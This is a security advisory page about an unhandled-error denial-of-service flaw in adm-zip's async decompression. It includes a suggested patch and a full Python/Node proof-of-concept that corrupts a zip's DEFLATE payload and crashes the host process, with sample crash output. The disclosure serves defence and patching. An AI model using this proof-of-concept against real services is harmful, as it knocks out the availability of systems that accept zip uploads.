GHSA-8238-w5pm-2374High· 7.5▾ Twilightadm-zip: Unhandled error event in async DEFLATE decompression crashes Node.js process (DoS)
▾ Twilight zone — High severity, or a signal on a lesser flaw
impact 41.3 · likelihood 0 · exploitation 0
Need a working PoC? Pro members can cast a request and our team develops one — it lands right here.
Denial of Service in adm-zip's async decompression API allows an unauthenticated attacker to crash the entire Node.js host process by supplying a single malformed ZIP file.
Affected package: adm-zip
Affected versions: at least 0.6.0 (current latest); likely all versions containing the current inflateAsync implementation in methods/inflater.js
Patched version: 0.6.1
methods/inflater.js:12-32 (inflateAsync) creates a zlib.createInflateRaw(option) stream and feeds it attacker-controlled compressed bytes via tmp.end(inbuf), but never registers an "error" listener on the stream:
inflateAsync: function (/*Function*/ callback) {
var tmp = zlib.createInflateRaw(option),
parts = [],
total = 0;
tmp.on("data", function (data) { parts.push(data); total += data.length; });
tmp.on("end", function () { /* build buf, callback(buf) */ });
tmp.end(inbuf); // no tmp.on("error", ...) registered anywhere
}
Per Node.js EventEmitter/stream semantics, an "error" event emitted with zero listeners is rethrown as an uncaught exception on a later tick, originating from the zlib C++ binding. This cannot be caught by a try/catch wrapped around the calling code, because the throw happens asynchronously, outside the synchronous call stack the try/catch covers.
This code path is reached from every public async API that decompresses entry data: readFileAsync, readAsTextAsync, extractAllToAsync, and ZipEntry.getDataAsync (zipEntry.js:51, :97-120, :309-315; adm-zip.js:157-164, :192-210, :893).
This library recently patched CVE-2026-39244 (GHSA-xcpc-8h2w-3j85), an unbounded Buffer.alloc() on the synchronous decompression path. That fix added a maxOutputLength option to zlib.inflateRawSync/zlib.createInflateRaw, and the sync path's resulting throw is naturally catchable. The async path shares the same maxOutputLength option (methods/inflater.js:5) but has no error-handling on the stream at all, so it was not covered by that fix and remains exploitable via either of two independent triggers:
Z_DATA_ERROR) — no special crafting needed.maxOutputLength guard — but on the stream this surfaces via the unhandled "error" event rather than a catchable throw.const zip = new AdmZip(uploadedBuffer);
zip.readFileAsync(zip.getEntries()[0], (data) => { /* ... */ });
inflateAsync begins decompressing; zlib emits "error" on Z_DATA_ERROR.Any Node.js service that accepts untrusted ZIP uploads and processes them via adm-zip's async API (the documented, recommended pattern for non-blocking servers) can be crashed by a single unauthenticated request containing one small malicious file. This is a full process-level denial of service, not a per-request error.
Attached: poc_async_dos.py. Summary of what it does:
new AdmZip(); zip.addFile(...); zip.toBuffer()), guaranteeing correct headers/CRC/offsets.0xFF, corrupting only the DEFLATE payload.new AdmZip(badBuf) (succeeds — headers are intact) and calls entries[0].getDataAsync(callback), wrapped in try/catch, in an isolated child process.Verified independently 3/3 runs (plus 2 isolating controls: an unmodified zip through the same path does not crash; bare Node zlib.createInflateRaw() fed garbage with no error listener reproduces the identical crash outside adm-zip entirely, confirming the root cause is the missing listener, not something else). Representative output:
[*] Child process exit code: 1
----- Node child process stderr (crash evidence) -----
node:events:497
throw er; // Unhandled 'error' event
^
Error: invalid distance too far back
at genericNodeError (node:internal/errors:983:15)
at Zlib.zlibOnError [as onerror] (node:zlib:191:17)
Emitted 'error' event on InflateRaw instance at:
at emitErrorNT (node:internal/streams/destroy:170:8)
at emitErrorCloseNT (node:internal/streams/destroy:129:3)
at process.processTicksAndRejections (node:internal/process/task_queues:89:21) {
errno: -3,
code: 'Z_DATA_ERROR'
}
Node.js v22.22.1
--------------------------------------
[*] Caught by harness's own try/catch (would mean NOT vulnerable): False
[*] getDataAsync callback ever fired (would mean NOT vulnerable): False
[*] Child process exited non-zero (crashed): True
[+] VULNERABILITY CONFIRMED
Reproduction: python3 poc_async_dos.py (requires python3 and Node.js; tested on Node.js v22.22.1).
Register an "error" listener on the InflateRaw stream in methods/inflater.js's inflateAsync, and route it to the existing callback, e.g.:
inflateAsync: function (/*Function*/ callback) {
var tmp = zlib.createInflateRaw(option),
parts = [],
total = 0;
tmp.on("data", function (data) { parts.push(data); total += data.length; });
tmp.on("error", function (err) {
// surface as a normal async error instead of crashing the process
callback(Buffer.alloc(0), err); // or however this codebase's async
// error convention is expressed
});
tmp.on("end", function () { /* existing behavior */ });
tmp.end(inbuf);
}
The exact callback/error-propagation convention should match the rest of the codebase's async error handling style (a quick look suggests callbacks here are currently success-only; this may need a small signature adjustment or an err-first convention, at the maintainer's discretion). The key fix is simply: never leave a Node.js stream without an "error" listener when it can plausibly error on attacker-controlled input.
poc_async_dos.py)#!/usr/bin/env python3
"""
Tested version: adm-zip 0.6.0
Tested on: Linux, Node.js v22.22.1
Description:
methods/inflater.js:12-32 (inflateAsync) creates a
zlib.createInflateRaw(option) stream and calls tmp.end(inbuf) without ever
registering an "error" listener on the stream. Per Node.js EventEmitter
semantics, an "error" event emitted with zero listeners is rethrown as an
uncaught exception -- this happens on a later tick from the zlib C++
binding, so it CANNOT be caught by a try/catch wrapped around the calling
code. Any code that feeds an untrusted zip file into one of adm-zip's
public *Async APIs (readFileAsync, readAsTextAsync, extractAllToAsync,
ZipEntry.getDataAsync) crashes the entire host Node.js process the moment
it encounters a DEFLATE entry with corrupted/malformed compressed bytes.
The synchronous decompression path (getData()) was hardened for
CVE-2026-39244 (maxOutputLength + a throw that is naturally catchable);
this async streaming path was missed by that fix and remains an
unauthenticated, single-request availability bug.
Impact:
Any service that accepts untrusted zip uploads and reads/extracts them
via adm-zip's async API (the officially documented, recommended usage
for non-blocking servers) can be crashed by a single malicious zip file,
with no authentication and no special privileges required.
Reproduction:
1. Install: this PoC runs directly against the adm-zip source tree this
script lives alongside (no `npm install` needed -- it requires the
local checkout via its package.json "main" entry, adm-zip.js).
Requires: python3, node (tested with Node.js v22.22.1).
2. Run: python3 poc_async_dos.py
3. Observe: the spawned Node child process exits non-zero with an
"Unhandled 'error' event" / Z_DATA_ERROR stack trace on stderr,
originating from methods/inflater.js's zlib.createInflateRaw stream.
Neither the harness's try/catch nor the getDataAsync callback ever
fires -- proving the crash is unrecoverable from calling code.
How the malicious zip is built (see the embedded Node harness in
build_harness_script() below):
1. Use adm-zip's own writer (`new AdmZip(); zip.addFile(...); zip.toBuffer()`)
to produce a fully valid, well-formed zip archive with one DEFLATE
entry. This guarantees every header/CRC/offset field is structurally
correct.
2. Locate the local file header at offset 0 and compute the compressed
data region from the (untouched) LOCSIZ/LOCNAM/LOCEXT fields.
3. XOR every byte in that region with 0xFF, corrupting ONLY the DEFLATE
payload while leaving every size/offset/CRC field in the local header,
central directory, and EOCD record byte-for-byte unchanged, so
adm-zip's own parser still locates and slices exactly the right
region and reaches the vulnerable inflateAsync() call.
"""
import os
import subprocess
import sys
import tempfile
# ============================================================
# Configuration
# ============================================================
PACKAGE_NAME = "adm-zip"
TARGET_VERSION = "0.6.0"
# The adm-zip source tree this PoC lives alongside (Hunter's checkout).
REPO_DIR = os.path.dirname(os.path.abspath(__file__))
NODE_BIN = "node"
SUBPROCESS_TIMEOUT_SECONDS = 20
# ============================================================
# Node.js harness (the genuine trigger -- adm-zip is a JS library, so the
# actual exploit code must run under Node; this Python script builds it,
# runs it in an isolated child process, and interprets the result).
# ============================================================
def build_harness_script(repo_dir: str) -> str:
return r"""
"use strict";
const AdmZip = require(%(repo_dir)r);
console.log("HARNESS_START");
// Step 1: build a legitimate zip in memory using adm-zip's OWN writer, with
// one DEFLATE-compressed entry. Repetitive text compresses well and
// guarantees the DEFLATED method is chosen (not STORED).
const zip = new AdmZip();
const payload = Buffer.from(
"The quick brown fox jumps over the lazy dog. ".repeat(200),
"utf8"
);
zip.addFile("payload.txt", payload, "");
const goodBuf = zip.toBuffer();
console.log("BUILT_GOOD_ZIP bytes=" + goodBuf.length);
// Step 2: locate the local file header (offset 0 in this single-entry
// archive) and corrupt ONLY the compressed-data bytes in place, leaving
// every size/offset/CRC field in the local header, central directory, and
// EOCD record untouched -- so adm-zip's own parser still finds and slices
// exactly the right region and reaches the vulnerable inflateAsync() path.
const LOCSIG = 0x04034b50;
if (goodBuf.readUInt32LE(0) !== LOCSIG) {
throw new Error("unexpected local header signature -- adm-zip writer output changed");
}
const compressedSize = goodBuf.readUInt32LE(18); // LOCSIZ
const fileNameLen = goodBuf.readUInt16LE(26); // LOCNAM
const extraLen = goodBuf.readUInt16LE(28); // LOCEXT
const dataStart = 30 + fileNameLen + extraLen;
const dataEnd = dataStart + compressedSize;
console.log(
"LOCAL_HEADER compressedSize=" + compressedSize +
" dataStart=" + dataStart + " dataEnd=" + dataEnd
);
const badBuf = Buffer.from(goodBuf); // copy, do not mutate original
for (let i = dataStart; i < dataEnd; i++) {
badBuf[i] = badBuf[i] ^ 0xff; // corrupt every byte of the DEFLATE stream
}
console.log("CORRUPTED_COMPRESSED_BYTES count=" + (dataEnd - dataStart));
// Step 3: parse the corrupted archive (this succeeds -- headers are intact)
// and hit the vulnerable async decompression path.
const zip2 = new AdmZip(badBuf);
const entries = zip2.getEntries();
console.log(
"PARSED_CORRUPT_ZIP entries=" + entries.length +
" name=" + entries[0].entryName
);
try {
// This is the public, documented API a real server would call on an
// untrusted upload (readFileAsync / getDataAsync / extractAllToAsync
// all funnel into the same decompress(true, ...) -> inflateAsync path).
entries[0].getDataAsync(function (data, err) {
// If this ever fires, the library handled the error gracefully
// (no crash) -- meaning the vulnerability is NOT present / already
// fixed in this build.
console.log(
"CALLBACK_FIRED data_len=" + (data ? data.length : 0) +
" err=" + err
);
});
console.log("SYNC_CALL_RETURNED_NO_THROW");
} catch (e) {
// If this ever fires, the bug is NOT present -- the error would be
// synchronously catchable by ordinary calling code.
console.log("CAUGHT_BY_TRY_CATCH: " + e.message);
}
console.log("HARNESS_END_OF_SYNCHRONOUS_CODE");
// Deliberately NOT registering process.on("uncaughtException", ...) here --
// doing so would mask the exact bug under test. A real, unmodified server
// process has no reason to install a blanket uncaughtException handler
// either; that is precisely what makes this an unrecoverable process crash.
""" % {"repo_dir": repo_dir}
# ============================================================
# Step 1: Setup
# ============================================================
def setup():
"""Verify prerequisites and write out the Node.js harness script."""
print(f"[*] Setting up PoC for {PACKAGE_NAME}@{TARGET_VERSION}")
print(f"[*] Target adm-zip source tree: {REPO_DIR}")
main_entry = os.path.join(REPO_DIR, "adm-zip.js")
if not os.path.isfile(main_entry):
print(f"[-] Cannot find adm-zip.js at {main_entry}")
sys.exit(1)
try:
node_version = subprocess.run(
[NODE_BIN, "--version"], capture_output=True, text=True, timeout=10
)
print(f"[*] Found Node.js: {node_version.stdout.strip()}")
except FileNotFoundError:
print("[-] node binary not found on PATH -- required to run this PoC")
sys.exit(1)
handle, harness_path = tempfile.mkstemp(prefix="admzip_async_dos_", suffix=".js")
with os.fdopen(handle, "w") as f:
f.write(build_harness_script(REPO_DIR))
print(f"[*] Wrote Node harness to {harness_path}")
return harness_path
# ============================================================
# Step 2: Trigger the vulnerability
# ============================================================
def trigger(harness_path):
"""Run the Node harness (in its own isolated child process) that builds
the malicious zip and feeds it into adm-zip's vulnerable async API."""
print("[*] Triggering vulnerability (spawning isolated Node subprocess)...")
try:
proc = subprocess.run(
[NODE_BIN, harness_path],
capture_output=True,
text=True,
timeout=SUBPROCESS_TIMEOUT_SECONDS,
cwd=REPO_DIR,
)
return {
"timed_out": False,
"returncode": proc.returncode,
"stdout": proc.stdout,
"stderr": proc.stderr,
}
except subprocess.TimeoutExpired as e:
return {
"timed_out": True,
"returncode": None,
"stdout": (e.stdout or b"").decode(errors="replace") if isinstance(e.stdout, bytes) else (e.stdout or ""),
"stderr": (e.stderr or b"").decode(errors="replace") if isinstance(e.stderr, bytes) else (e.stderr or ""),
}
# ============================================================
# Step 3: Verify impact
# ============================================================
def verify(result):
"""Check that the child process crashed with an unhandled 'error' event
originating from the async inflater, and that neither the try/catch nor
the getDataAsync callback in the harness ever ran."""
print("[*] Verifying impact...")
print(f"[*] Child process exit code: {result['returncode']}")
print()
print("----- Node child process stdout -----")
print(result["stdout"].rstrip())
print("----- Node child process stderr (crash evidence) -----")
print(result["stderr"].rstrip())
print("--------------------------------------")
print()
if result["timed_out"]:
print("[-] Harness timed out instead of crashing -- inconclusive")
return False
stdout = result["stdout"]
stderr = result["stderr"]
returncode = result["returncode"]
reached_vuln_call = "SYNC_CALL_RETURNED_NO_THROW" in stdout
was_caught = "CAUGHT_BY_TRY_CATCH" in stdout
callback_fired = "CALLBACK_FIRED" in stdout
process_crashed = returncode is not None and returncode != 0
unhandled_error_evidence = (
"Unhandled 'error' event" in stderr
or "ERR_UNHANDLED_ERROR" in stderr
or "Emitted 'error' event on InflateRaw instance" in stderr
)
print(f"[*] Reached vulnerable getDataAsync() call without throwing: {reached_vuln_call}")
print(f"[*] Caught by harness's own try/catch (would mean NOT vulnerable): {was_caught}")
print(f"[*] getDataAsync callback ever fired (would mean NOT vulnerable): {callback_fired}")
print(f"[*] Child process exited non-zero (crashed): {process_crashed}")
print(f"[*] stderr shows an unhandled 'error' event from the InflateRaw stream: {unhandled_error_evidence}")
success = (
reached_vuln_call
and not was_caught
and not callback_fired
and process_crashed
and unhandled_error_evidence
)
return success
# ============================================================
# Main
# ============================================================
if __name__ == "__main__":
print(f"=== CVE-CANDIDATE: {PACKAGE_NAME} async decompression DoS ===")
print(f"[*] Target version: {TARGET_VERSION}")
print()
harness_path = setup()
try:
result = trigger(harness_path)
success = verify(result)
finally:
try:
os.remove(harness_path)
print(f"[*] Cleaned up temp harness file: {harness_path}")
except OSError:
pass
print()
if success:
print("[+] VULNERABILITY CONFIRMED")
print(
"[+] Impact: a single untrusted zip file with a corrupted DEFLATE "
"entry crashes the entire Node.js process when read via any "
"adm-zip *Async API (readFileAsync / readAsTextAsync / "
"extractAllToAsync / ZipEntry.getDataAsync). Unauthenticated, "
"single-request, unrecoverable process-level Denial of Service."
)
else:
print("[-] Vulnerability NOT confirmed")
sys.exit(0 if success else 1)
adm-zip <= 0.6.0Upgrade to a patched release:
adm-zip 0.6.1Connected by shared product, vendor, weakness, or advisory.
GHSA-c6fg-446q-cg94Medium· 5.3adm-zip: getDataAsync() bypasses the maxOutputLength size guard enforced by the synchronous getData() path
GHSA-p634-w6r4-rjp2Medium· 5.9adm-zip: Duplicate ZIP entry names: getEntry() and extractAllTo() resolve to different content
CVE-2026-102282High· 7.1adm-zip extraction preserves SUID/SGID bits from untrusted ZIPs -> local privilege escalation
GHSA-rcw4-f5rp-g42vHigh· 7.5adm-zip: Decompression-bomb protection (fix for CVE-2026-39244) can be bypassed by declaring uncompressed size as 0
CVE-2026-77301High· 7.5adm-zip is a JavaScript library for creating and extracting ZIP archives in Node.js
CVE-2026-76845Medium· 6.5adm-zip 0.5.9 through 0.6.0 follows symbolic links at the extraction destination